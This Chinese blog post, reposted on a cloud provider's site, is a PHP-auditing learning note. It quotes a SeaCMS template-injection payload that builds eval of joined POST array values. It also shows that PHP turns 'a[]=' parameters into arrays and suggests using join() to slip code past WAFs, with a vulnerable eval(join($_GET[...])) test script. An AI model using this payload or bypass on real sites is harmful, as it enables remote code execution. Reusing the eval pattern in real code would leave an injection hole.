溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
獲取短信驗證碼
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
登 錄 注冊有禮
云服務器 香港服務器 高防服務器
最新更新 網站標簽 地圖導航
產品

php通過http請求發送數組

發布時間:2020-08-01 15:47:44 來源:網絡 閱讀:520 作者:z2pp 欄目:web開發

最近開始學習php審計,剛好趕上研究seacms,就發現了payload處一個奇怪的點

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

9[]=ph&9[]=pinfo();

就嘗試了一下,發現在接收數據時,例:

鍵名=a,那傳遞a[]=a&a[]=b時,a即為一個數組,便做了個測試,果真如此

服務器端測試代碼

<?php
	print_r($_GET[1]);
?>

測試結果如下

php通過http請求發送數組

php通過http請求發送數組


那么這一個有什么用呢?思考了一下,如果服務器上有安全狗或者waf等防護工具,那么配合其他php函數,例如join函數,可能可以達到繞過效果

提供一個簡單思路

服務器測試代碼

<?php
	eval(join($_GET[123]));
?>

測試結果如下

php通過http請求發送數組


錯誤之處,敬請指正

向AI問一下細節
推薦閱讀:
  1. 使用Requests發送Http請求
  2. springboot發送http請求

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

php學習

猜你喜歡

最新資訊
相關推薦

相關標簽

php數組 php擴展 phpldap php5.6 php分頁類 php漏洞 php編譯安裝 php版本 php程序設計 php算法 phpexcel php亂碼 php mysql php垃圾回收 thinkphp3.2 php異步執行 php文件上傳 搭建php環境 php-cs-fixer phpinfo()
AI

產品服務
地區劃分
專題活動
幫助支持
關于我們
售后咨詢
7*24小時在線電話:400-100-2938
7*24小時在線 QQ:800811969
關注億速云

億速云公眾號

手機網站二維碼

Copyright ? Yisu Cloud Ltd. All Rights Reserved. 2018 版權所有

廣州億速云計算有限公司粵ICP備17096448號-1 粵公網安備 44010402001142號增值電信業務經營許可證編號:B1-20181529

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女